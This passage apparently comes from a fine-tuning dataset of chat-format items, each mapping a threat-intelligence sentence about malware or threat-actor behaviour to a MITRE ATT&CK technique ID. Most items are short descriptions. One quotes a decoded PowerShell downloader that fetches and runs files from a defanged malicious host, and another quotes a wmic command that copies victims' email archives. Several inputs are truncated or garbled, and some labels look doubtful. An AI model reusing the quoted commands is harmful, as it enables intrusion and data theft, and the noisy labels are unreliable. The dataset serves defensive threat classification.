processes" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has the ability to perform timestomping of files on targeted systems." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OceanSalt can delete files from the system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The instance of Warzone we trapped has the ability to bypass UAC on the latest version of Windows 10. In this blog we’re going to talk about the XLS used as the attack vector and the UAC bypass technique used" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has harvested data from victim's e-mail including through execution of \"wmic /node: process call create \"cmd /c copy c:\\Users\\\\\\backup.pst c:\\windows\\temp\\backup.pst\" copy \"i:\\\\\\My Documents\\.pst\"\ncopy\"." }, { "role": "assistant", "content": "T1114.001 - Email Collection: Local Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA uses cmd.exe to execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs data exfiltration is accomplished through the following command-line command: from (- --).txt." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork encrypted the collected files' path with AES and then encoded them with base64." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves is capable of downloading a file from a specified URL." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba can enumerate processes running on a victim's machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "injects a malicious DLL into the IExplorer.exe process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can enumerate the victim's desktop." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DNS Monitoring Bypass The malware modifies the system DNS resolvers and uses Google’s public DNS servers to avoid being detected by DNS monitoring tools" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used a scheduled task to execute a malicious file." }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can record audio using any existing hardware recording devices." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has used \"msiexec\" to download and execute malicious Windows Installer files." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has stolen domain credentials by dumping LSASS process memory with comsvcs.dll and from a Microsoft Active Directory Domain Controller using Mimikatz." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has called \"GetIpNetTable\" in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet can access the victim’s webcam to take pictures." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentContorlSet\\Control\\WMI\\Security." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is prepended to the encrypted and encoded message" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode ." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download additional files from URLs." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN can download files and upgrade itself." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which using TOR-related domains. It collects and sends information about where the target machine is located to the C2 servers" }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. PowerShell downloader The downloaded PowerShell script code is obfuscated in several layers before the last layer is reached. Beginning of the \"download and load\" shellcode The shellcode is relatively simple and begins with a XOR loop that deobfuscates the rest of the code" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Sakula samples use cmd.exe to delete temporary files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke has used several C2 servers per targeted organization." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET will compress entire \"~/Desktop\" folders excluding all \".git\" folders, but only if the total data size is under 200MB." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As seen in the above image, the Bazar backdoor can handle quite a few commands. This next section focuses on case 1, which retrieves various pieces of additional information on the infected machine" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is known to have the capability to overwrite the firmware on hard drives from some manufacturers." }, { "role": "assistant", "content": "T1542.002 - Component Firmware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has created shortcuts in the Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain information about running processes on the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can store harvested data in a custom database under the %TEMP% directory." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Collected files under the preliminary collection directory will be compressed using a WinRAR instance that the Ramsay Installer drops. This compressed archive will be saved within the preliminary collection directory and then generate a Ramsay container artifact" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used Metasploit Bind and Reverse TCP stagers." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used revoked certificates to sign malware." }, { "role": "assistant", "content": "T1036.001 - Invalid Code Signature" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rifdoor has the ability to identify the IP address of the compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT can delete files and directories." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cryptoistic can scan a directory to identify files for deletion." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them" }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding', 'T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For the first time, the Bisonal developers decided to use a packer: MPRESS. The Bisonal string also disappears from the binary however the workflow of the malware stays the same and some features are copy/pasted from the previous Bisonal variant" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can identify the user name on a compromised system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY can perform keylogging by polling the \"GetAsyncKeyState()\" function." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The URL used can be found in the embedded OLE object:hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]Here is the source code of the downloaded HTA document:BonjourOnce decoded using the base64 algorithm, we are able to read the final payload:$c=new-object System.Net.WebClient$t =$env:temp$t1=$t+\"\\\\alitmp0131.jpg\"$t2=$t+\"\\\\alitmp0132.jpg\"$t3=$t+\"\\\\alitmp0133.js\"try { echo $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg\",$t1) $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg\",$t2) $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp\",$t3) wscript.exe $t3 }catch { }The purpose of this script is to download and execute a Windows script and two encoded payloads" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some samples use a custom encryption method for C2 traffic using AES, base64 encoding, and multiple keys." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encodes files in Base64." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download additional payloads onto the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession has the ability to execute inside the msiexec.exe process." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to download and execute an additional file." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Netwalker can use WMI to delete Shadow Volumes." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious can run \"GET.WORKSPACE\" in Microsoft Excel to check if a mouse is present." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can inject into a target process including Svchost, Explorer, and cmd using process hollowing." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN4 has used legitimate credentials to hijack email communications." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki has used Ngrok to establish C2 and exfiltrate data." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EKANS uses standard encryption library functions to encrypt files." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious DLL is not a service DLL because it lacks ServiceMain()" }, { "role": "assistant", "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CWS or WSA web scanning prevents access to malicious websites, including watering hole attacks, and detects malware used in these attacks" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy's default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed." }, { "role": "assistant", "content": "T1546.007 - Event Triggered Execution: Netsh Helper DLL" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa collected the system volume serial number, GUID, and computer name." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used compromised domain accounts to gain access to the target environment." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it’s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling ‘fudpages’, was found during this campaign activity based on their utilization of shared infrastructure. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JHUHUGIT obtains a list of running processes on the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OwaAuth — This web shell and credential stealer deployed to Microsoft Exchange servers is installed as an ISAPI filter" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carberp's bootkit can inject a malicious DLL into the address space of running processes." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malicious spearphishing payloads are executed as . has also used during and." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has sent spearphishing emails containing malicious attachments in the form of PDFs, Word documents, JavaScript files, and Control Panel File (CPL) executables." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences, Windows vault credential objects, or using ." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine’s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the ‘++a++’ markers. The example C2s used by older variants of Comnie demonstrates this" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has performed screen captures of victims." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has added paths to executables in the Registry to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] 